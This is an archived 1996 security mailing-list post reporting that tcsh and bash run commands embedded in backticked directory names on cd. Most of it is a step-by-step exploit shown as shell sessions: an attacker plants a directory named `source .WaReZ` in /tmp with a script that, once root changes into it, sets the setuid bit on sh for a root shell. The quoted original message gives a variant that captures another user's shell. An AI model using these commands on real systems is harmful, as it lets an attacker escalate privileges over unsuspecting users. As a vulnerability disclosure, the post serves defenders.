From: SMTP%"hartwick@primeline.net" 14-SEP-1996 15:12:22.69 To: EVERHART CC: Subj: BoS: tee see shell problems Resent-Date: Sat, 14 Sep 1996 13:51:12 +1000 Date: Fri, 13 Sep 1996 22:53:11 -0400 (EDT) From: "Michael J. Hartwick" To: test cc: Multiple recipients of list BUGTRAQ , best-of-security@suburbia.net In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Resent-Message-ID: <"5v-En1.0.vu1.jkYEo"@suburbia> Resent-From: best-of-security@suburbia.net X-Mailing-List: archive/latest/367 X-Loop: best-of-security@suburbia.net Precedence: list Resent-Sender: best-of-security-request@suburbia.net Subject: BoS: tee see shell problems I just tested a variation of this exploit with bash 1.14.6(1) running on Linux 2.0.13. By using my variation I managed to become root. I find this frightening. In my variation I wasn't as subtle. To use a large portion of the original exploit. Hopefully things like this won't happen, but it is possible. I know that I will forever be much more careful when cd'ing from now on. This is a very simplistic example, but I am sure more difficult ones can be devised. ----------------------------Cut to Bad guy-------------------------------- jim% whoami Evol bad guy jim% mkdir /tmp/\`source\ .WaReZ\` jim% cd /tmp/\`source\ .WaReZ\` jim% echo chmod 4755 `which sh` 2\&\> /dev/null > .WaReZ jim% chmod +x .WaReZ jim% cd ---------------------------Cut to unsuspecting foo------------------------ jim# whoami root jim# echo $SHELL /bin/bash jim# I just like to check that sometimes. jim# Hey, I'm bored maybe I'll check /tmp for some neato stuff jim# cd /tmp jim# ls `source .WaReZ` jim# OH BOY!!! the jack pot! jim# cd *WaReZ* jim# ls jim# oh, oh well maybe I'll check later... jim# cd ----------------------------Cut to More Bad guy-------------------------- jim% bash #whoami root # hah. ---------------------------End Unix Parable------------------------------- On Fri, 13 Sep 1996, test wrote: >A vulnerability exists in tcsh (tcsh 6.05, or the one that's being handed >out with BSDI anyway.) that allows the execution of arbitrary commands >when changing into directories that are enclosed with back tic's. The >problem might also prove to be quite bad to tcsh scripts that find >themselves changing into directories on the fly. > >Here is probably one of the dumbest methods possible that could be used to >exploit this weakness. > >----------------------------Cut to Bad guy-------------------------------- > >jim% whoami >Evol bad guy >jim% mkdir /tmp/\`source\ .WaReZ\` >jim% echo echo #\\\!/bin/sh \> .\$\$ > /tmp/*W*/.WaReZ >jim% echo echo sh \> .\$\$ >> /tmp/*W*/.WaReZ >jim% echo chmod 4755 .\$\$ >> /tmp/*W*/.WaReZ >jim% chmod +x /tmp/*W*/.WaReZ > >---------------------------Cut to unsuspecting foo------------------------ > >jim% whoami >Unsuspecting foo >jim% echo $SHELL >/bin/tcsh >jim% I just like to check that sometimes. >jim% Hey, I'm bored maybe I'll check /tmp for some neato stuff >jim% cd /tmp >jim% ls > >`source .WaReZ` > >jim% OH BOY!!! the jack pot! >jim% cd *WaReZ* >jim% ls > >jim% oh, oh well maybe I'll check later... >jim% cd $HOME > >----------------------------Cut to More Bad guy-------------------------- > >jim% ls -a /tmp/*W*/ > >. >.. >.24753 > >jim% /tmp/*W*/.24753 >$whoami >unsuspecting foo >$ hah. >---------------------------End Unix Parable------------------------------- > ---------------------------------------------------------------------------- Michael J. Hartwick, VE3SLQ Hartwick Communications Consulting hartwick@primeline.net